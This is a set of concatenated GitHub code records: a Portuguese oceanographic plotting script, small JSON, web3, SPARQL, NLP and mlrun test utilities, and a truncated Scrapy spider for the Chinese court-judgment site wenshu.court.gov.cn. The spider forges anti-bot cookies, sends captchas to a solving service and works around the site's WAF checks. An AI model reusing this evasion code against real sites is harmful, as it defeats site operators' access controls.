index=[int(ey)],\n columns=ckdata.columns))\n ckdata = ckdata.sort_index()\n bars = {x: ckdata[x].values for x in ckdata.columns}\n else:\n ckdata = param.loc[bc].xs(MNTHLBL[m - 1], level=1)\n lmts = list(ckdata.columns)\n lmts.reverse()\n bars = {x: ckdata[x].values for x in lmts}\n\n ax = fig.add_subplot(\n int('{}1{}'.format(len(param.index.levels[0]), splt + 1)))\n\n if len(bars) > 2:\n colors = ['#E24A33', '#FBC15E', '#27AE60']\n else:\n colors = ['#E24A33', '#FBC15E']\n\n bottom = np.zeros(len(xtik))\n for n, bar in enumerate(bars.keys()):\n rects2 = ax.bar(\n xtik,\n bars[bar],\n width, color=colors[n],\n bottom=np.nan_to_num(bottom),\n align='center', alpha=.7, edgecolor='k',\n label=bar)\n bottom += bars[bar]\n\n\n if name == 'wind':\n ax.set_ylim(0., 40)\n dy, legx = 6, .738\n else:\n ax.set_ylim(0., 120)\n dy, legx = 10, .868\n ax.set_xlim(0 - width, xtik[-1] + width)\n ax.set_ylabel('Registros (%)', fontsize=14)\n \n ax.text(-0.4, ax.get_ylim()[1] - dy, bc, fontsize=14, weight='bold')\n\n plt.xticks(xtik, xlbl, fontsize=14)\n for label in ax.xaxis.get_majorticklabels():\n label.set_fontsize(14)\n for label in ax.yaxis.get_majorticklabels():\n label.set_fontsize(14)\n # COLOCANDO VALORES NAS BARRAS\n texto = [(bars[x]) for x in bars.keys()]\n\n bottom = np.zeros(len(xtik))\n for tx in texto:\n strnumb = ['{0:2.1f}%'.format(round(x, 2)).replace('.', ',') for x in tx]\n for _, x in enumerate(range(len(xtik))):\n txt = ax.text(\n xtik[x],\n tx[x] + bottom[x],\n strnumb[x],\n horizontalalignment='center',\n fontsize=11)\n plt.setp(\n txt,\n path_effects=[\n 
PathEffects.withStroke(linewidth=3, foreground=\"w\")])\n bottom += tx\n\n ax.legend(\n prop={'size': 14},\n bbox_to_anchor=(legx, -.2),\n ncol=len(bars))\n\n fig.savefig(\n '{}\\\\{}_anual.png'.format(PATH, name),\n format='png',\n bbox_inches='tight')\n\n\n# _____________________________________________________________________________\n# PLOTA DADO DOS ÚLTIMOS DOIS ANOS\n# _____________________________________________________________________________\nnewlabel = MNTHLBL.__add__(tuple(\n ['Média \\n ponderada \\n (Jan - {})'.format(MNTHLBL[m_interesse[0]-1]),\n 'Total \\n de {}\\n e {}'.format(param.index.levels[1][-2], param.index.levels[1][-3])]\n))\n\nxax2 = np.append(np.arange(1, 13), 14)*1.3\nwidth = 0.3\n\nfor name, param in zip(['wind', 'wave'], [_wind, _wave]):\n fig = plt.figure(figsize=(12, 9))\n yr = list(param.index.levels[1][-3:])\n\n ordem = ['Bacia de Santos', 'Bacia de Campos', 'Bacia do Espírito Santo']\n for splt, bc in enumerate(ordem):\n\n ax = fig.add_subplot(int('{}1{}'.format(\n len(param.index.levels[0]),\n splt + 1)))\n for i, y in enumerate(yr):\n if i == 0:\n dx = -.3\n sb = .3\n linewidth = 1\n elif i == 1:\n dx = .0\n sb = .7\n linewidth = 1\n else:\n dx = .3\n sb = 1.\n linewidth = 2\n\n # Calculado o peso de cada mês para média ponderada\n peso = []\n for m in np.arange(1, 13, 1):\n peso.append(np.mean([\n monthrange(y, m)[1]\n for y in np.unique(param.loc[bc].index.get_level_values(0))\n ]) / 31)\n try:\n # pegando somente os percentuais dos meses até o mês de interesse\n sqz = param.loc[bc].loc[y].drop('Total', axis=0)\n # pegando percentuais até o mes de interesse para acumulado\n avg = param.loc[bc].loc[y].drop('Total', axis=0)[:m_interesse[0]]\n\n lmts = list(param.columns)\n lmts.reverse()\n bars = {}\n for cll in lmts:\n bars[cll] = np.nan_to_num(np.append(\n sqz[cll].values,\n round(np.average(\n avg[cll].values,\n weights=peso[:m_interesse[0]]), 2)))\n\n # the bars\n if len(bars) > 2:\n colors = ['#E24A33', '#FBC15E', '#27AE60']\n else:\n colors = ['#E24A33', '#FBC15E']\n\n bottom = np.zeros(len(xax2))\n for n, bar in enumerate(bars.keys()):\n rects2 = ax.bar(\n xax2 + dx,\n bars[bar],\n width, color=colors[n],\n bottom=np.nan_to_num(bottom),\n align='center', alpha=sb, edgecolor='k',\n label=bar, linewidth=linewidth)\n bottom += np.nan_to_num(bars[bar])\n\n for label in ax.xaxis.get_majorticklabels():\n label.set_fontsize(14)\n for label in ax.yaxis.get_majorticklabels():\n label.set_fontsize(14)\n except Exception:\n continue\n # texto = [(bars[x]) for x in bars.keys()]\n\n # bottom = np.zeros(len(xax2))\n # for tx in texto:\n # strnumb = ['{0:2.1f}%'.format(round(x, 2)).replace('.', ',') for x in tx]\n # for _, x in enumerate(range(len(xax2))):\n # txt = ax.text(\n # xax2[x] + dx,\n # tx[x] + bottom[x],\n # strnumb[x],\n # horizontalalignment='center',\n # fontsize=11)\n # plt.setp(\n # txt,\n # path_effects=[\n # PathEffects.withStroke(linewidth=3, foreground=\"w\")])\n # bottom += tx\n\n # ax.set_xlim(0, 17)\n if name == 'wind':\n ax.set_ylim(0., 40)\n ax.text(0.2, ax.get_ylim()[1] - 6, bc, fontsize=14, weight='bold')\n\n else:\n ax.set_ylim(0., 110)\n ax.text(0.2, ax.get_ylim()[1] - 10, bc, fontsize=14, weight='bold')\n ax.set_ylabel('Registros (%)', fontsize=14)\n\n sb, dx = [.3, .7], [-.3, .3]\n for m, yss in enumerate(yr[:-1]):\n btm = 0\n for n, cll in enumerate(lmts):\n acmval = param.loc[bc].loc[yss].loc['Total'][cll]\n acum = ax.bar(\n 16*1.3 + dx[m], acmval,\n width + .2, color=colors[n],\n align='center', alpha=sb[m], bottom=btm, 
edgecolor='k')\n btm += acmval\n if splt == len(param.index.levels[0]) - 1:\n plt.xticks(np.append(xax2, 16 * 1.3), newlabel,\n fontsize=14, rotation=0)\n else:\n plt.xticks([])\n\n if name == 'wind':\n bboxx = (.86, -.40)\n xx0, yy0 = -1., -23\n xx1, yy1 = 5.6, -23\n xx2, yy2 = 12.6, -23\n if name == 'wave':\n bboxx = (.82, -.4)\n xx0, yy0 = .03, -60\n xx1, yy1 = 6.0, -60\n xx2, yy2 = 12.5, -60\n ax.text(xx2, yy2, str(yr[2]), weight='bold')\n ax.text(xx1, yy1, str(yr[1]), weight='bold')\n ax.text(xx0, yy0, str(yr[0]), weight='bold')\n\n ax.legend(\n prop={'size': 12},\n bbox_to_anchor=bboxx,\n frameon=False,\n ncol=3,\n columnspacing=5.5)\n\n fig.savefig(\n '{}\\\\{}_compara_{}_{}_{}.png'.format(PATH, name, yr[0], yr[1], yr[2]),\n format='png',\n bbox_inches='tight')\n\n# _____________________________________________________________________________\n# EXPORTANDO TABELA UTILIZADA NO RELATÓRIO \n# _____________________________________________________________________________\nwindtable = _wind.xs(MNTHLBL[m_interesse[0] - 1], level=2)\nwavetable = _wave.xs(MNTHLBL[m_interesse[0] - 1], level=2)\nindyrs = np.arange(2018, windtable.index.levels[1][-1] + 1, 1)\n\ntwd, twv = pd.DataFrame(), pd.DataFrame()\nfor bc in windtable.index.levels[0]:\n wd = windtable.loc[bc].loc[indyrs]\n mnyrs = windtable.loc[bc][:-1].mean().to_frame().T\n mnyrs.index = ['{} a {}'.format(windtable.loc[bc].index[0],\n windtable.loc[bc].index[-2])]\n wd = wd.append(mnyrs)\n wd[\"Total\"] = wd.sum(axis=1)\n wd = wd.round(1)\n\n twd = twd.append(pd.concat([wd], keys=[bc], names=['Bacia']))\n\n wv = wavetable.loc[bc].loc[indyrs]\n mnyrs = wavetable.loc[bc][:-1].mean().to_frame().T\n mnyrs.index = ['{} a {}'.format(wavetable.loc[bc].index[0],\n wavetable.loc[bc].index[-2])]\n wv = wv.append(mnyrs)\n wv[\"Total\"] = wv.sum(axis=1)\n wv = wv.round(1)\n\n twv = twv.append(pd.concat([wv], keys=[bc], names=['Bacia']))\n\nbcorder = ['Bacia de Santos', 'Bacia de Campos', 'Bacia do Espírito Santo']\nexcel = pd.ExcelWriter('{}\\\\Tabela_relatorio.xlsx'.format(PATH))\nfor sheet, parm in zip(('vento', 'onda'), (twd, twv)):\n parm.T[bcorder].T.to_excel(excel, sheet_name=sheet)\nexcel.close()\n\n#_________________________________________________________________\n# Linhas para plot de comparação entre UCDs, média e mediana\n\n # fig, ax = plt.subplots(1, 1, figsize=[15, 10])\n # for ucd in wind.index.levels[0]:\n # wind.loc[ucd].loc['YOUNG'].WSPD.plot(\n # ax=ax,\n # alpha=1,\n # linewidth=0,\n # marker='o',\n # markersize=4)\n # wind.groupby(level=[2]).median().WSPD.plot(\n # ax=ax,\n # linestyle='-',\n # alpha=1,\n # linewidth=2,\n # color='k')\n # wind.groupby(level=[2]).mean().WSPD.plot(\n # ax=ax,\n # linestyle='-',\n # alpha=1,\n # linewidth=2,\n # color='r')\n # fig.savefig(\n # '{}\\\\teste1.png'.format(PATH),\n # format='png',\n # bbox_inches='tight',\n # dpi=600)\n\n # fig, ax = plt.subplots(1, 1, figsize=[15, 10])\n # for ucd in wind.index.levels[0]:\n # wind.loc[ucd].loc['YOUNG'].WSPD[:200].plot(\n # ax=ax,\n # alpha=1,\n # linewidth=0,\n # marker='o',\n # markersize=4)\n # wind.groupby(level=[2]).median().WSPD[:200].plot(\n # ax=ax,\n # linestyle='-',\n # alpha=.7,\n # linewidth=3,\n # color='k')\n # wind.groupby(level=[2]).mean().WSPD[:200].plot(\n # ax=ax,\n # linestyle='-',\n # alpha=.7,\n # linewidth=3,\n # color='r')\n # fig.savefig(\n # '{}\\\\teste2.png'.format(PATH),\n # format='png',\n # bbox_inches='tight',\n # 
dpi=600)\n","repo_name":"thiag0p/BHYK_scripts_ocn","sub_path":"scripts/05.Demandas_diferenciadas/Analise_desempenho.py","file_name":"Analise_desempenho.py","file_ext":"py","file_size_in_byte":17778,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"421752812","text":"import json\n\n# data = '{\"aa\":\"北京\"}'\n# dict_data = json.loads(data)\n# print(data,type(data))\n# print(dict_data,type(dict_data))\n# str_data = json.dumps(dict_data)\n# print(str_data,type(str_data)),\n#\n# with open('temp.json','w') as f:\n# f.write(str_data)\n\nwith open('temp.json','r') as f:\n data = json.load(f)\nprint(data)\n\nwith open('temp2.json','w') as g:\n json.dump(data,g)","repo_name":"ioscarry/JXWY_PLUS","sub_path":"dump_load.py","file_name":"dump_load.py","file_ext":"py","file_size_in_byte":387,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"73554576786","text":"import json\nimport logging\nfrom logging import FileHandler\nfrom logging import Formatter\nimport os\nimport time\nimport numpy as np\nfrom pacemaker.v00 import Pacemaker\n\nCLOCK_FREQ_HZ = 48\nN_ACTIONS = 2\nN_POSITIONS = 5\n\n# valid levels are {DEBUG, INFO, WARNING, ERROR, CRITICAL}\nLOGGING_LEVEL = logging.INFO\n\n\nclass World:\n \"\"\"\n In this world, the agent can occupy one of N_POSITIONS on a line.\n It has two actions available, move right and move left by one position.\n Attempts to move past the last position have no effect.\n\n action[0] indicates a move to the left\n action[1] indicates a move to the right\n \"\"\"\n\n def __init__(self):\n self.pacemaker = Pacemaker(CLOCK_FREQ_HZ)\n self.n_actions = N_ACTIONS\n self.n_positions = N_POSITIONS\n\n # Initialize the world\n self.position = np.random.randint(self.n_positions)\n\n # Set up logging\n os.makedirs(\"log\", exist_ok=True)\n log_name = f\"{int(time.time())}\"\n self.logger = logging.getLogger(\"world\")\n self.logger.setLevel(LOGGING_LEVEL)\n logger_file_handler = FileHandler(\n os.path.join(\"log\", f\"{log_name}_world.log\"))\n logger_file_handler.setLevel(LOGGING_LEVEL)\n logger_file_handler.setFormatter(Formatter(\"%(message)s\"))\n self.logger.addHandler(logger_file_handler)\n\n def run(self, model_action_q, model_sensor_q, animation_sensor_q):\n while True:\n self.pacemaker.beat()\n # The combined effect of all actions issued.\n # Positive values are steps to the right.\n # Negative values are steps to the left.\n # Zero means no action.\n net_action = 0\n while not model_action_q.empty():\n timestamp, actions = model_action_q.get()\n self.logger.debug(\n json.dumps(\n {\n \"level\": \"DEBUG\",\n \"ts\": timestamp,\n \"action_received\": list(actions),\n }\n )\n )\n net_action = net_action - actions[0] + actions[1]\n\n # Apply the actions\n self.position += net_action\n # Enforce lower and upper limits\n self.position = np.maximum(\n 0, np.minimum(self.n_positions - 1, self.position)\n )\n acted_time = time.time()\n self.logger.debug(\n json.dumps(\n {\n \"level\": \"DEBUG\",\n \"ts\": acted_time,\n \"new_position\": int(self.position),\n }\n )\n )\n\n # Communicate the new position back to the model\n sensors = np.zeros(self.n_positions)\n try:\n sensors[int(self.position)] = 1\n except IndexError:\n self.logger.debug(\n json.dumps(\n {\n \"level\": \"ERROR\",\n \"ts\": acted_time,\n \"msg\": (\n f\"IndexError assigning position {self.position}\"\n + f\"to sensor array of size {sensors.size}\"\n ),\n }\n )\n )\n\n model_sensor_q.put((acted_time, 
sensors))\n animation_sensor_q.put((acted_time, sensors))\n","repo_name":"brohrer/robot-training-game","sub_path":"world/v03.py","file_name":"v03.py","file_ext":"py","file_size_in_byte":3531,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"3130781873","text":"import json\nfrom typing import Callable\n\nfrom eth_account.signers.local import (\n LocalAccount,\n)\nfrom web3 import Web3, HTTPProvider\n\nfrom scripts_py.libs.accounts import AccountsHandler\n\n\nclass W3Obj:\n\n def __init__(self, url: str = \"http://localhost:8545\", *args, **kwargs):\n self.w3 = Web3(HTTPProvider(url))\n self.accounts_handler = AccountsHandler()\n self.set_signer(self.accounts_handler.accounts[0])\n print(\"Connected? \", self.w3.isConnected())\n\n def get_w3(self) -> Web3:\n return self.w3\n\n def get_eoa(self, key: str) -> LocalAccount:\n if not self.accounts_handler.check_pk(key):\n raise ValueError(f\"{key} does not exist\")\n eoa = self.w3.eth.account.privateKeyToAccount(key)\n return eoa\n\n def set_signer(self, key):\n eoa = self.get_eoa(key)\n self.signer = eoa\n\n def _get_nonce(self, signer):\n return self.w3.eth.get_transaction_count(signer.address)\n\n def send_transaction(self, function: Callable, tx_kwargs: list, signer=None):\n signer = signer or self.signer\n try:\n tx = function(*tx_kwargs).buildTransaction({\n 'from': signer.address,\n 'gas': 30000000,\n 'maxFeePerGas': self.w3.toWei('2', 'gwei'),\n 'maxPriorityFeePerGas': self.w3.toWei('1', 'gwei'),\n 'nonce': self._get_nonce(signer),\n })\n signed_tx = signer.sign_transaction(tx)\n tx_hash = self.w3.eth.send_raw_transaction(signed_tx.rawTransaction)\n tx_receipt = self.w3.eth.wait_for_transaction_receipt(tx_hash)\n return tx_receipt\n except Exception as e:\n try:\n print(\"Error:\", e.args[0][\"data\"][\"message\"])\n except:\n print(\"Error: \", str(e))\n return None\n\n\n\n\n","repo_name":"ReadMost/voyage_rauan_hw","sub_path":"scripts_py/libs/w3_basic.py","file_name":"w3_basic.py","file_ext":"py","file_size_in_byte":1860,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"35325949965","text":"import re\nimport json\n\nENTITY_PATTERN = re.compile('Q[0-9]+')\nPREDICATE_PATTERN = re.compile('P[0-9]+')\n\nwith open(\"../data/labels_dict.json\") as labelFile:\n labels_dict = json.load(labelFile)\n\ndef is_timestamp(timestamp):\n pattern = re.compile('^[0-9][0-9][0-9][0-9]-[0-9][0-9]-[0-9][0-9]T00:00:00Z')\n if not(pattern.match(timestamp)):\n return False\n else:\n return True\n\n\ndef convertTimestamp(timestamp):\n yearPattern = re.compile('^[0-9][0-9][0-9][0-9]-00-00T00:00:00Z')\n monthPattern = re.compile('^[0-9][0-9][0-9][0-9]-[0-9][0-9]-00T00:00:00Z')\n dayPattern = re.compile('^[0-9][0-9][0-9][0-9]-[0-9][0-9]-[0-9][0-9]T00:00:00Z')\n timesplits = timestamp.split(\"-\")\n year = timesplits[0]\n if yearPattern.match(timestamp):\n return year\n month = convertMonth(timesplits[1])\n if monthPattern.match(timestamp):\n return month + \" \" + year\n elif dayPattern.match(timestamp):\n day = timesplits[2].rsplit(\"T\")[0]\n return day + \" \" + month + \" \" + year\n\n return timestamp\n\ndef convertMonth(month):\n return{\n \"01\": \"january\",\n \"02\": \"february\",\n \"03\": \"march\",\n \"04\": \"april\",\n \"05\": \"may\",\n \"06\": \"june\",\n \"07\": \"july\",\n \"08\": \"august\",\n \"09\": \"september\",\n \"10\": \"october\",\n \"11\": \"november\",\n \"12\": \"december\"\n }[month]\n\n\ndef get_label(entity):\n 
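# resolve a display label: Q/P ids looked up in labels_dict (counter suffix like P10-23 stripped), timestamps formatted, '+'-prefixed quantities unprefixed; plain strings returned as-is\n    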
label = \"\"\n if entity.startswith(\"Q\") or entity.startswith(\"P\"):\n #for predicates: P10-23, split away counting\n if \"-\" in entity:\n e = entity.split(\"-\") [0]\n else:\n e = entity\n if e in labels_dict.keys():\n label = labels_dict[e]\n else:\n if is_timestamp(entity):\n label = convertTimestamp(entity)\n elif entity.startswith(\"+\"):\n label = entity.split(\"+\")[1]\n else:\n label = entity\n\n return label\n\n\ndef fill_missing_prefixes(prefixes, sparql):\n new_sparql = sparql\n for alias, uri in prefixes.items():\n if sparql.find(alias) != -1 and sparql.find(uri) == -1:\n new_sparql = uri + \" \" + new_sparql\n return new_sparql\n\n# if __name__ == '__main__':\n# sparql = \"SELECT ?obj WHERE { wd:Q567 p:P39 ?s . ?s ps:P39 ?obj . ?s pq:P580 ?x filter(contains(YEAR(?x),'1994')) }\"\n# PREFIXES_WIKIDATA = {\n# \" p:\": \"PREFIX p: \",\n# \"wdt:\": \"PREFIX wdt: \",\n# \"wd:\": \"PREFIX wd: \",\n# \"xsd:\": \"PREFIX xsd: \",\n# \"pq:\": \"PREFIX pq: \",\n# \"ps:\": \"PREFIX ps: \",\n# \"rdfs:\": \"PREFIX rdfs: \"\n# }\n# print(fill_missing_prefixes(PREFIXES_WIKIDATA, sparql))","repo_name":"semantic-systems/seq2sparql-rl","sub_path":"utils/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":2921,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"20691400395","text":"import torch \nimport numpy as np\nimport json\nfrom bert_seq2seq import Tokenizer, load_chinese_base_vocab\nfrom bert_seq2seq import load_bert\n\n\npredicate2id, id2predicate = {}, {}\nwith open('../state_dict/all_50_schemas', encoding=\"utf-8\") as f:\n for l in f:\n l = json.loads(l)\n if l['predicate'] not in predicate2id:\n id2predicate[len(predicate2id)] = l['predicate']\n predicate2id[l['predicate']] = len(predicate2id)\n\ndef search(pattern, sequence):\n \"\"\"从sequence中寻找子串pattern\n 如果找到,返回第一个下标;否则返回-1。\n \"\"\"\n n = len(pattern)\n for i in range(len(sequence)):\n if sequence[i:i + n] == pattern:\n return i\n return -1\n\ndef search_subject(token_ids, subject_labels, idx2word):\n # subject_labels: (lens, 2)\n if type(subject_labels) is torch.Tensor:\n subject_labels = subject_labels.numpy()\n if type(token_ids) is torch.Tensor:\n token_ids = token_ids.cpu().numpy()\n subjects = []\n subject_ids = []\n start = -1\n end = -1\n for i in range(len(token_ids)):\n if subject_labels[i, 0] > 0.5:\n start = i\n for j in range(len(token_ids)):\n if subject_labels[j, 1] > 0.5:\n subject_labels[j, 1] = 0\n end = j\n break\n if start == -1 or end == -1:\n continue\n subject = \"\"\n for k in range(start, end + 1):\n subject += idx2word[token_ids[k]]\n # print(subject)\n subject_ids.append([start, end])\n start = -1\n end = -1\n subjects.append(subject)\n\n return subjects, subject_ids\n\ndef search_object(token_ids, object_labels, idx2word):\n objects = []\n if type(object_labels) is torch.Tensor:\n object_labels = object_labels.numpy()\n if type(token_ids) is torch.Tensor:\n token_ids = token_ids.cpu().numpy()\n start = np.where(object_labels[:, :, 0] > 0.5)\n end = np.where(object_labels[:, :, 1] > 0.5)\n for _start, predicate1 in zip(*start):\n for _end, predicate2 in zip(*end):\n if _start <= _end and predicate1 == predicate2:\n object_text = \"\"\n for k in range(_start, _end + 1):\n # print(token_ids(k))\n object_text += idx2word[token_ids[k]]\n objects.append(\n (id2predicate[predicate1], object_text)\n )\n break \n \n return objects\n\ndef relation_extract(model, text, word2idx, tokenizer, device=\"cpu\"):\n idx2word = {v: k for k , v 
in word2idx.items()}\n with torch.no_grad():\n token_ids_test, segment_ids = tokenizer.encode(text, max_length=256)\n token_ids_test = torch.tensor(token_ids_test, device=device).view(1, -1)\n # 先预测subject\n pred_subject = model.predict_subject(token_ids_test)\n pred_subject = pred_subject.squeeze(0)\n subject_texts, subject_idss = search_subject(token_ids_test[0], pred_subject.cpu(), idx2word)\n if len(subject_texts) == 0:\n return \"没有预测出任何信息\"\n result_info = \"\"\n for sub_text, sub_ids in zip(subject_texts, subject_idss):\n result_info += \"s is \" + str(sub_text) + \"\\n\"\n sub_ids = torch.tensor(sub_ids, device=device).view(1, -1)\n # print(\"sub_ids shape is \" + str(sub_ids))\n object_p_pred = model.predict_object_predicate(token_ids_test, sub_ids)\n res = search_object(token_ids_test[0], object_p_pred.squeeze(0).cpu(), idx2word)\n result_info += \"p and o is \" + str(res) + \"\\n\"\n return result_info\n\n\n\n\n\n","repo_name":"920232796/NLP_flask","sub_path":"nlp_api/test/relation_extract_test.py","file_name":"relation_extract_test.py","file_ext":"py","file_size_in_byte":3730,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"48"} +{"seq_id":"8662664651","text":"import unittest.mock\n\nimport pytest\n\nimport automation.package_test.test\nimport tests.conftest\nfrom mlrun.utils import logger\n\n\ndef test_test_requirements_vulnerabilities():\n package_tester = automation.package_test.test.PackageTester()\n cases = [\n {\n \"output\": \"\"\"\n[\n [\n \"fastapi\",\n \"<0.75.2\",\n \"0.67.0\",\n \"Fastapi 0.75.2 updates its dependency 'ujson' ranges to include a security fix.\",\n \"48159\",\n null,\n null\n ]\n]\"\"\",\n \"expected_to_fail\": True,\n },\n {\n \"output_file\": tests.conftest.tests_root_directory\n / \"automation\"\n / \"package_test\"\n / \"assets\"\n / \"ignored_vulnerabilities.json\",\n },\n {\n \"output\": \"\",\n },\n ]\n for case in cases:\n logger.info(\"Testing case\", case=case)\n\n def _run_command_mock(command, *args, **kwargs):\n # _test_requirements_vulnerabilities flow is running two commands:\n # 1. pip install safety - we don't care about it, so simply return success\n # 2. 
safety check --json - this is the actual one we want to mock the output for\n if command == \"pip install safety\":\n return 0, \"\", \"\"\n elif command == \"safety check --json\":\n if case.get(\"output_file\"):\n with open(case[\"output_file\"]) as file:\n output = file.readlines()\n output = \"\".join(output)\n else:\n output = case.get(\"output\")\n code = 255 if output else 0\n return code, output, \"\"\n else:\n raise NotImplementedError(f\"Got unexpected command: {command}\")\n\n package_tester._run_command = unittest.mock.Mock(side_effect=_run_command_mock)\n if case.get(\"expected_to_fail\"):\n with pytest.raises(AssertionError, match=\"Found vulnerable requirements\"):\n package_tester._test_requirements_vulnerabilities(\"some-extra\")\n else:\n package_tester._test_requirements_vulnerabilities(\"some-extra\")\n","repo_name":"Hedingber/mlrun","sub_path":"tests/automation/package_test/test_package_test.py","file_name":"test_package_test.py","file_ext":"py","file_size_in_byte":2173,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"48"} +{"seq_id":"22228447713","text":"# -*- coding: utf-8 -*-\nimport os\nimport sys\nimport uuid\nimport re\nimport json\nimport time\nimport random\nimport calendar\nimport execjs\nimport scrapy\nimport logging\nimport requests\n\nfrom scrapy import signals\nfrom twisted.internet import reactor, defer, task\nfrom twisted.names import client\nfrom twisted.internet import task\nfrom scrapy.spidermiddlewares.httperror import HttpError\nfrom twisted.web._newclient import ResponseNeverReceived\nfrom twisted.internet.error import DNSLookupError, ConnectionLost, TimeoutError, TCPTimedOutError, ConnectionRefusedError\nfrom scrapy.http import Response, TextResponse\n\nfrom wenshu import jshelper\nfrom wenshu.items import TaskItem, DocItem\nfrom wenshu.exceptions import WafVerifyError, RemindKeyError, RemindError, Vl5xTimeoutError\n\nfrom netifaces import AF_INET\nimport netifaces as ni\n\nlogger = logging.getLogger(__name__)\n\nclass ListSpider(scrapy.Spider):\n\tname = 'list'\n\tallowed_domains = ['court.gov.cn']\n\tcustom_settings = {\n\t\t'CONCURRENT_REQUESTS': 1024,\n\t\t'RETRY_ENABLED': True,\n\t\t'MAX_RETRY_TIMES': 3,\n\t\t'DOWNLOAD_TIMEOUT': 30,\n\t\t'DOWNLOAD_DELAY': 0,\n\t\t'CONCURRENT_REQUESTS_PER_DOMAIN': 256,\n\t\t'CONCURRENT_REQUESTS_PER_IP': 256\n\t}\n\tstart_urls = []\n\n\thandle_httpstatus_all = True\n\n\tHOME_URL = 'http://wenshu.court.gov.cn'\n\tSTART_URL = 'http://wenshu.court.gov.cn/List/List?sorttype=1&conditions=searchWord+2+AJLX++案件类型:民事案件'\n\tLIST_CONTENT_URL = 'http://wenshu.court.gov.cn/List/ListContent'\n\tCODE_URL = 'http://wenshu.court.gov.cn/ValiCode/GetCode'\n\n\tCAPTCHA_URL = 'http://wenshu.court.gov.cn/User/ValidateCode/'\n\tCAPTCHA_VALIDATE_URL = 'http://wenshu.court.gov.cn/Content/CheckVisitCode'\n\n\tCAPTCHA_SOLVE_URL = 'http://localhost:5000/solve'\n\tF80COOKIES_URL = 'http://localhost:3000/f80Cookies'\n\n\tCONCURRENT_SESSIONS_PER_IP = 64\n\n\tWAF_DELAY = 310\n\n\tCHANGE_IP_ENABLED = False\n\n\tSTATS_INTERVAL = 60\n\n\tDEBUG_TASK_IDS = []\n\n\tlast_task = {}\n\n\t# available_proxies = {}\n\t# used_proxies = {}\n\twenshu_servers = ['61.160.224.60']\n\n\tstats = {\n\t\t'start': time.time(),\n\t\t'speed': 0,\n\t\t'total': 0,\n\t\t'_count_queue': [],\n\t\t'_last_scraped_count': {'time': time.time(), 'count': 0}\n\t}\n\n\tdef start_requests(self):\n\t\tself._init_stats_task()\n\n\t\tself.wenshu_servers = self.crawler.settings.get('WENSHU_SERVERS', [])\n\t\tfor request in 
self.CdnRequests():\n\t\t\tyield request\n\n\tdef CdnRequests(self):\n\t\trequests = []\n\t\tfor i in range(0, len(self.wenshu_servers) if self.wenshu_servers else 1):\n\t\t\tfor count in range(0, self.CONCURRENT_SESSIONS_PER_IP):\n\t\t\t\trequest = self.ListRequest()\n\t\t\t\trequest.meta['delay_request'] = random.random() * self.CONCURRENT_SESSIONS_PER_IP\n\t\t\t\tif self.wenshu_servers:\n\t\t\t\t\trequest.meta['ip_addr'] = self.wenshu_servers[i]\n\t\t\t\trequests.append(request)\n\t\treturn requests\n\n\tdef ListRequest(self):\n\t\tf80s = jshelper.f80sCookie()\n\t\tf80t = jshelper.f80tCookie()\n\t\treturn scrapy.Request(url = self.START_URL, headers = {'Referer': 'http://wenshu.court.gov.cn'}, cookies = {'FSSBBIl1UgzbN7N80T': f80t, 'FSSBBIl1UgzbN7N80S': f80s}, callback = self.parse_list, errback = self.other_error, dont_filter = True, meta = {'dont_delay': True})\n\n\tdef NumberRequest(self):\n\t\tpost_data = {'guid': self.create_guid()}\n\t\treturn scrapy.FormRequest(url = self.CODE_URL, formdata = post_data, headers = {'Referer': 'http://wenshu.court.gov.cn'}, callback = self.parse_number, errback = self.other_error)\n\n\tdef parse(self, response):\n\t\traise Exception('Unkown request!')\n\n\tdef ListContentRequest(self, response, task = None):\n\t\tsession = response.request.meta.get('session', None)\n\n\t\tif task is None:\n\t\t\ttask = self.last_task = self.task_pipeline.next_list_task()\n\n\t\tif not task:\n\t\t\tlogger.info('No more task')\n\t\t\treturn\n\n\t\tpage = task.get('page', 1)\n\t\tpost_data = {\n\t\t\t'Param': self._task_to_post_param(task),\n\t\t\t'Index': str(page if page else 1),\n\t\t\t'Page': \"10\",\n\t\t\t'Order': '法院层级',\n\t\t\t'Direction': 'asc',\n\t\t\t'vl5x': session.get('vl5x', ''),\n\t\t\t'number': session.get('number', ''),\n\t\t\t'guid': self.create_guid()\n\t\t}\n\n\t\tf80s = jshelper.f80sCookie()\n\t\tf80t = jshelper.f80tCookie()\n\n\t\trequest = scrapy.FormRequest(url = self.LIST_CONTENT_URL, formdata = post_data, headers = {'Referer': 'http://wenshu.court.gov.cn'}, cookies = {'FSSBBIl1UgzbN7N80T': f80t, 'FSSBBIl1UgzbN7N80S': f80s}, callback = self.list_request_loop, errback = self.other_error, meta = {'task': task, 'param': post_data})\n\t\tlogger.debug('Processing task: Param:{};Index:{}'.format(post_data['Param'], post_data['Index']))\n\n\t\tif task.get('task_id') == -1:\n\t\t\trequest.meta['delay_request'] = 10\n\t\t\tsession['no_task_sleep_count'] = session.get('no_task_sleep_count', 0) + 1\n\t\t\tif session.get('no_task_sleep_count', 0) > 5:\n\t\t\t\traise scrapy.exceptions.CloseSpider('Finished because no more tasks!')\n\t\t\telse:\n\t\t\t\tlogger.info('Wait 10 secs for new task...')\n\n\t\treturn request\n\n\tdef list_request_loop(self, response):\n\t\ttask = response.request.meta.get('task', None)\n\t\tif len(response.text) == 0: #retry\n\t\t\tlogger.debug('response is empty, retry for task ' + str(task.get('task_id')))\n\t\t\tyield self.ListContentRequest(response, task)\n\t\t\treturn\n\t\ttry:\n\t\t\tjson_string = eval(response.text)\n\t\t\tjson_string = json_string.replace('\\r', '').replace('\\n', '').replace('\\t', '').replace('\\\\\\\",\\\"案件类型\\\"', '\\\",\\\"案件类型\\\"').replace('0\\\"},]', '0\\\"}]')\n\n\t\t\tdata = json.loads(json_string)\n\n\t\t\trunEval = data[0].get('RunEval', '')\n\n\t\t\tdoc_count = int(data[0].get('Count', '0'))\n\t\t\ttask['doc_count'] = 